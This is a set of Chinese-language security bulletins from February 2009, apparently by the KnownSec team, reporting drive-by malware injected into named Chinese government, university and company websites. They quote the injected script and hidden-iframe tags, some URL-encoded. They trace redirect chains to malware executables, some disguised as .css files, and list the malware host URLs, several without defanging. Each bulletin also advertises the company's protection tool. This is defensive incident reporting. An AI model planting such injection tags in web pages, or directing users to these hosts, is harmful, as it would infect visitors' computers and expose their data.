知道创宇

发布时间：Sat Feb 28 2009 20:35:04 UTC+0800
最后更新时间：Sat Feb 28 2009 20:35:04 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：中山市民众镇政府公众网、复旦大学附属中山医院器官移植中心、烟台金宝精密印刷设备有限公司、连云港渴望装饰、
 

中山市民众镇政府公众网（hxxp://www.minzhong.gov.cn/）多处被植入恶意代码：
<script src=hxxp://%68%68%6A%39%2E%63%6E></script>
恶意链接地址解密后为：
hxxp://hhj9.cn
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

复旦大学附属中山医院器官移植中心（hxxp://www.transplantation.com.cn/）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://mon.qc.cx/asd.js?s=201&col=ffdd00″></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

烟台金宝精密印刷设备有限公司（hxxp://www.yantaiwuzhou.com/）被植入恶意代码：
<script language=”javascript” src=”hxxp://office4.ze.tc/office.js?do=list&uid=193&type=blog”></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

连云港渴望装饰（hxxp://www.kewangzs.com/）被植入恶意代码：
<script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%76%76%6B%37%2E%63%6E></script><script src=hxxp://%68%68%6A%38%2E%63%6E></script><script src=hxxp://%76%76%6B%39%2E%63%6E></script><script src=hxxp://%76%76%6B%39%2E%63%6E></script><script src=hxxp://%76%76%6B%39%2E%63%6E></script><script src=hxxp://%76%76%6B%39%2E%63%6E></script><script src=hxxp://%76%76%6B%39%2E%63%6E></script><script src=hxxp://%62%62%67%31%2E%63%6E></script><script src=hxxp://%63%63%6B%31%2E%63%6E></script><script src=hxxp://%63%63%6B%31%2E%63%6E></script><script src=hxxp://%63%63%6B%33%2E%63%6E></script><script src=hxxp://%63%63%6B%33%2E%63%6E></script><script src=hxxp://%63%63%6B%33%2E%63%6E></script><script src=hxxp://%63%63%6B%33%2E%63%6E></script><script src=hxxp://%68%68%6A%39%2E%63%6E></script><script src=hxxp://%68%68%6A%39%2E%63%6E></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 10% [?]

发布时间：Fri Feb 27 2009 21:49:12 UTC+0800
最后更新时间：Fri Feb 27 2009 21:49:12 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：中国超市策划网、同瑞科技开发有限责任公司、
 

中国超市策划网（hxxp://www.cncsch.com/fs_inc/prototype.js）被植入恶意代码：
document.writeln(”<script src=hxxp://ww.funskyo.cn/stat.js></script>”);
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

同瑞科技开发有限责任公司（hxxp://www.torisoft.cn/）多处被植入恶意代码：
<iframe src=hxxp://www.hao3956.cn/b3.htm width=50 height=0 border=0></iframe><iframe src=hxxp://www.good7389.cn/b3.htm width=50 height=0 border=0></iframe><script src=hxxp://%63%63%6B%31%2E%63%6E></script><iframe src=hxxp://www.good6368.cn/b3.htm width=50 height=0 border=0></iframe><iframe src=hxxp://www.good6368.cn/b3.htm width=50 height=0 border=0></iframe><script src=hxxp://%63%63%6B%33%2E%63%6E></script><iframe src=hxxp://www.good1685.cn/b3.htm width=50 height=0 border=0></iframe><script src=hxxp://%63%63%6B%33%2E%63%6E></script><iframe src=hxxp://www.good1685.cn/b3.htm width=50 height=0 border=0></iframe><script src=hxxp://%63%63%6B%33%2E%63%6E></script><script src=hxxp://%63%63%6B%33%2E%63%6E></script><iframe src=hxxp://www.love2068.cn/b3.htm width=50 height=0 border=0></iframe><script src=hxxp://%68%68%6A%39%2E%63%6E></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 10% [?]

发布时间：Wed Feb 25 2009 19:13:32 UTC+0800
最后更新时间：Wed Feb 25 2009 19:13:32 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：威盛科技(香港)有限公司、北京算通科技发展有限公司、深圳市零零壹科技有限公司、
 

威盛科技(香港)有限公司（hxxp://www.winsond.com/）多处被植入恶意代码：
<script language=javascript src=hxxp://%61%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
恶意链接地址解密后为：
hxxp://a.94saomm.com/js.js
通过漏洞攻击，最终下载病毒：
hxxp://d.wuc8.com/xx.exe
hxxp://chinesedoublec.com/tv/UUSee.CAB
hxxp://d.wuc8.com/dd/10.exe

北京算通科技发展有限公司（hxxp://www.cti.com.cn/）多处被植入恶意代码：
<script src=hxxp://3b3.org/c.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.wuc8.com/xx.exe
hxxp://chinesedoublec.com/tv/UUSee.CAB
hxxp://d.wuc8.com/dd/10.exe
 

深圳市零零壹科技有限公司（hxxp://www.001jk.net/）多处被植入恶意代码：
<script language=”javascript” src=”hxxp://office4.ze.tc/office.js?do=list&uid=193&type=blog”></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 11% [?]

发布时间：Tue Feb 24 2009 21:37:12 UTC+0800
最后更新时间：Tue Feb 24 2009 21:37:12 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：东莞地产市场网、淄博市政府采购网、保定市人事局、中国通用航空协会官方网站、
 

东莞地产市场网（hxxp://www.dgfdc.net/newscenter/shownews.asp?newsid=32976）被植入恶意代码：
<script src=hxxp://3b%6Fmb.com/c.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://w.wesy67.com/01/ok.exe
hxxp://w.wesy67.com/01/UUSee.CAB

淄博市政府采购网（hxxp://www.zbzfcg.gov.cn/）被植入恶意代码：
<iframe src=hxxp://www.jltao8.com/include/css/1.asp width=0 height=0></iframe>
通过漏洞攻击，最终下载病毒：
hxxp://w.qqnetcn.cn/d3.exe
hxxp://w.qqnetcn.cn/Baidu.cab
hxxp://w.muu998.com/UUSee.CAB
hxxp://w.qqnetcn.cn/dd.exe
 

保定市人事局（hxxp://www.bdrsj.gov.cn/）被植入恶意代码：
<script src=hxxp://www.419.com.cn/1.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://l.bugxue.com/qwer/a15.css
hxxp://l.bugxue.com/qwer/ms.css
hxxp://l.bugxue.com/qwer/as.css
hxxp://l.bugxue.com/qwer/bf.css
hxxp://l.bugxue.com/qwer/re.css
hxxp://l.bugxue.com/qwer/real11.css
 

中国通用航空协会官方网站（hxxp://www.ga.gov.cn/）被植入恶意代码：
<iframe src=hxxp://www.good1685.cn/b3.htm width=50 height=0 border=0></iframe>
通过漏洞攻击，最终下载病毒：
hxxp://d.opqxn.com/new/a2.css
hxxp://d.bnksw.com/new/a1.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 10% [?]

发布时间：Mon Feb 23 2009 20:46:18 UTC+0800
最后更新时间：Mon Feb 23 2009 20:46:18 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：黑龙江语言文字网、黑龙江卫生监督所、暨阳人口网、无锡市第一中学、
 

黑龙江语言文字网（hxxp://www.hljyw.net/）底部被植入恶意代码：
<script language=”javascript” src=”hxxp://mon.qc.cx/asd.js?s=201&col=ffdd00″></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

黑龙江卫生监督所（hxxp://www.hljwsjd.com/）底部被植入恶意代码：
<ifRame sRc=hxxp://www.good5296.cn/one/a46.htm width=50 height=0 boRdeR=0></ifRame>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

暨阳人口网（hxxp://www.jyrk.com.cn/）被植入恶意代码：
<script src=hxxp://%77%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.wuc8.com/xx.exe
hxxp://rencai002.vool.cn/bc/UUSee.CAB
 

无锡市第一中学（hxxp://www.wxyzedu.net/）被植入恶意代码：
<script src=hxxp://zs.gcp.edu.cn/z.js></script>
通过漏洞攻击，最终下载病毒：
hxxp://l.bugxue.com/baidu.cab
hxxp://l.bugxue.com/qwer/ms.css
hxxp://l.bugxue.com/qwer/as.css
hxxp://l.bugxue.com/qwer/bf.css
hxxp://l.bugxue.com/qwer/lzz.css
hxxp://l.bugxue.com/qwer/re.css
hxxp://l.bugxue.com/qwer/real11.css
 

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 11% [?]

发布时间：Sun Feb 22 2009 20:13:52 UTC+0800
最后更新时间：Sun Feb 22 2009 20:13:52 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 瑞丽女性网（http://www.rayli.com.cn/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.rayli.com.cn/comjs/2008newabout.js

网页被嵌入恶意链接代码：

document.writeln(”<iframe src=http:\/\/q.fgjg1.cn\/hjll\/25.htm width=100 height=0><\/Iframe>”);
挂马分析：
[wide]http://www.rayli.com.cn/
 [script]http://www.rayli.com.cn/comjs/2008newabout.js
  [frame]http://q.fgjg1.cn/hjll/25.htm
   [frame]http://z.kghh1.cn/d2/fxx.htm
    [frame]http://z.kghh1.cn/d2/all.htm
     [frame]http://z.kghh1.cn/d2/1.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/0.htm
      [exe]http://w.qqnetcn.cn/dd.exe
     [frame]http://z.kghh1.cn/d2/newlz.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/s.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/office.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/bf.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/cx.htm
      [exe?]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/uu.htm
      [exe?]http://w.muu998.com/uusee.cab
     [frame]http://z.kghh1.cn/d2/2.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/3.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/4.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/5.htm
      [exe]http://w.qqnetcn.cn/d2.exe
     [frame]http://z.kghh1.cn/d2/b.htm
      [cab]http://w.qqnetcn.cn/baidu.cab
     [frame]http://z.kghh1.cn/d2/b.htm
    [cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
   [script]http://js.tongji.cn.yahoo.com/929405/ystat.js
 
最终下载病毒文件：
http://w.qqnetcn.cn/dd.exe
http://w.qqnetcn.cn/d2.exe
http://w.qqnetcn.cn/baidu.cab
http://w.muu998.com/uusee.cab

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 11% [?]

发布时间：Sun Feb 22 2009 20:13:52 UTC+0800
最后更新时间：Sun Feb 22 2009 20:13:52 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 安康市统计信息网（http://www.akstats.gov.cn/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.akstats.gov.cn/

网页被嵌入恶意链接代码：

<script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%76%76%6B%39%2E%63%6E></script><script src=http://%62%62%67%31%2E%63%6E></script><script src=http://%63%63%6B%31%2E%63%6E></script><script src=http://%63%63%6B%33%2E%63%6E></script>

挂马分析：
[wide]http://www.akstats.gov.cn/
 [script]http://www.akstats.gov.cn//article/js/article_wjtz.js
 [script]http://www.akstats.gov.cn//article/js/article_tjfx.js
 [script]http://www.akstats.gov.cn//article/js/article_gzdt.js
 [script]http://www.akstats.gov.cn//article/js/article_dcbg.js
 [script]http://www.akstats.gov.cn//article/js/article_zfcs.js
 [script]http://www.akstats.gov.cn//article/js/article_zfal.js
 [script]http://%76%76%6b%39%2e%63%6e
  [frame]http://www.sll4362.cn/a1/ilink.html
  [frame]http://www.sll4362.cn/a1/flink.html
  [frame]http://www.good7389.cn/b2.htm
   [frame]http://www.sll4362.cn/a2/fxx.htm
    [frame]http://www.sll4362.cn/a2/fx.htm
    [frame]http://www.sll4362.cn/a2/../a1/ss.htm
     [script]http://www.sll4362.cn/a2/../a1/xmybrx.js
      [exe]http://d.bnksw.com/new/a1.css
    [frame]http://www.sll4362.cn/a2/../a1/ms06014.htm
    [frame]http://www.sll4362.cn/a2/../a1/sina.htm
     [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/no.htm
     [script]http://www.sll4362.cn/a2/../a1/wokaono.js
      [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/bfyy.htm
    [frame]http://www.sll4362.cn/a2/../a1/glworld.html
     [script]http://www.sll4362.cn/a2/../a1/hohogl.js
      [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/real.htm
     [script]http://www.sll4362.cn/a2/../a1/mybrreal.js
      [exe]http://d.opqxn.com/new/a2.css
    [frame]http://www.sll4362.cn/a2/../a1/real.html
     [script]http://www.sll4362.cn/a2/../a1/realdadong.js
      [exe]http://d.opqxn.com/new/a2.css
   [script]http://js.tongji.cn.yahoo.com/857114/ystet.js
 [script]http://%76%76%6b%39%2e%63%6e
 [script]http://%76%76%6b%39%2e%63%6e
 [script]http://%76%76%6b%39%2e%63%6e
 [script]http://%62%62%67%31%2e%63%6e
  [frame]http://www.sll4362.cn/a1/ilink.html
  [frame]http://www.sll4362.cn/a1/flink.html
  [frame]http://www.good7389.cn/b2.htm
 [script]http://%63%63%6b%31%2e%63%6e
  [frame]http://www.sll4362.cn/a1/ilink.html
  [frame]http://www.sll4362.cn/a1/flink.html
  [frame]http://www.good7389.cn/b2.htm
 [script]http://%63%63%6b%33%2e%63%6e
 
最终下载病毒文件：
http://d.bnksw.com/new/a1.css
http://d.opqxn.com/new/a2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 10% [?]

发布时间：Sat Feb 21 2009 18:20:34 UTC+0800
最后更新时间：Sat Feb 21 2009 18:20:34 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获以下网站被植入恶意代码：上海全球通国际快递服务有限公司、内蒙古网吧联盟官方网站、
 

上海全球通国际快递服务有限公司（hxxp://www.guojikuaidi.com/）顶部被植入恶意代码：
<script language=”javascript” src=”hxxp://office4.ze.tc/office.js?do=list&uid=193&type=blog”></script>
通过漏洞攻击，最终下载病毒：
hxxp://d.bnksw.com/new/a1.css
hxxp://d.opqxn.com/new/a2.css
 

内蒙古网吧联盟官方网站（hxxp://www.nmgwblm.com/）底部被植入恶意代码：
<Script Src=hxxp://c%2Enuclear3.com/css/c.js></Script>
通过漏洞攻击，最终下载病毒：
hxxp://w.muu998.com/01/ok.exe
hxxp://w.muu998.com/01/Baidu.cab

推荐的应对方法： 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 13% [?]

发布时间：Thu Feb 19 2009 20:53:27 UTC+0800
最后更新时间：Thu Feb 19 2009 20:53:27 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于今天捕获 中国青少年新世纪读书网（http://www.cnread.net/）被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.cnread.net/cnread1.js

网页被嵌入恶意链接代码：
<SCRIPT src=”http://www.cnread.net/cnread1/cnread1.js”></SCRIPT>

挂马分析：
[wide]http://www.cnread.net/cnread1/xdwx/index.html
 [script]http://www.cnread.net/cnread1.js
  [script]http://www.cnread.net/cnread1/cnread1.js
   [frame]http://u1.nnspare.com/public.php?u=12904&s=356&m=12904&h=e914a2a3cbf6d62ae1dcbd6072ed5358
   [script]http://leiyanstatic.xunlei.com/js/leiyanentry.js?
   [script]http://pagead2.googlesyndication.com/pagead/show_ads.js
   [frame]http://www.hao3176.cn/ydll/6.htm
    [frame]http://www.slll4j.cn/a159/fxx.htm
     [frame]http://www.slll4j.cn/a159/fx.htm
     [frame]http://www.slll4j.cn/a159/../a1/ss.htm
      [script]http://www.slll4j.cn/a159/../a1/woriniss.js
       [exe]http://d.opqxn.com/new/a2.css
     [frame]http://www.slll4j.cn/a159/../a1/ms06014.htm
      [exe]http://d.opqxn.com/new/a1.css
     [frame]http://www.slll4j.cn/a159/../a1/sina.htm
      [exe]http://d.opqxn.com/new/a2.css
     [frame]http://www.slll4j.cn/a159/../a1/no.htm
     [frame]http://www.slll4j.cn/a159/../a1/bfyy.htm
     [frame]http://www.slll4j.cn/a159/../a1/glworld.html
      [script]http://www.slll4j.cn/a159/../a1/hohogl.js
       [exe]http://d.opqxn.com/new/a2.css
     [frame]http://www.slll4j.cn/a159/../a1/real.htm
      [script]http://www.slll4j.cn/a159/../a1/mybrreal.js
       [exe]http://d.opqxn.com/new/a2.css
     [frame]http://www.slll4j.cn/a159/../a1/real.html
      [script]http://www.slll4j.cn/a159/../a1/wokaono.js
       [exe]http://d.opqxn.com/new/a2.css
    [script]http://js.tongji.cn.yahoo.com/857114/ystat.js
   [script]http://js.users.51.la/1001681.js

最终下载病毒文件：
http://d.opqxn.com/new/a1.css
http://d.opqxn.com/new/a2.css

通过执行以上病毒文件，来达到完全控制访问者的系统。

知道创宇安全团队（KnownSec team）建议用户及时安装系统安全更新补丁，使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神，

可到www.365menshen.com下载并试用。

Popularity: 11% [?]

发布时间：Thu Feb 19 2009 11:32:02 UTC+0800
最后更新时间：Thu Feb 19 2009 11:32:02 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于近期捕获针对ms09-002漏洞编写的特制网页。如果用户使用 Internet Explorer 查看特制网页，则所有漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

对于在 Windows XP 和 Windows Vista 的所有受支持版本上运行的 Internet Explorer 7，此安全更新的等级为“严重”。 对于在 Windows Server 2003 和 Windows Server 2008 的所有受支持版本上运行的 Internet Explorer 7，此安全更新的等级为“中等”。

受影响的软件

  该漏洞利用了IE对释放的对象重利用的异常，经过精心编写shellcode进行利用，可达到在客户端远程执行代码的效果。

漏洞的利用代码片段已经在网络被公布，最早出现于国外。近期内有可能出现小规模利用该漏洞进行挂马攻击。

该漏洞攻击页面存在于hxxp://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html

下载病毒：

htxp://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.exe 

推荐的应对方法：

1.目前官方已经发布补丁，请及时安装安全更新补丁并开启自动更新：

http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx

2. 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 23% [?]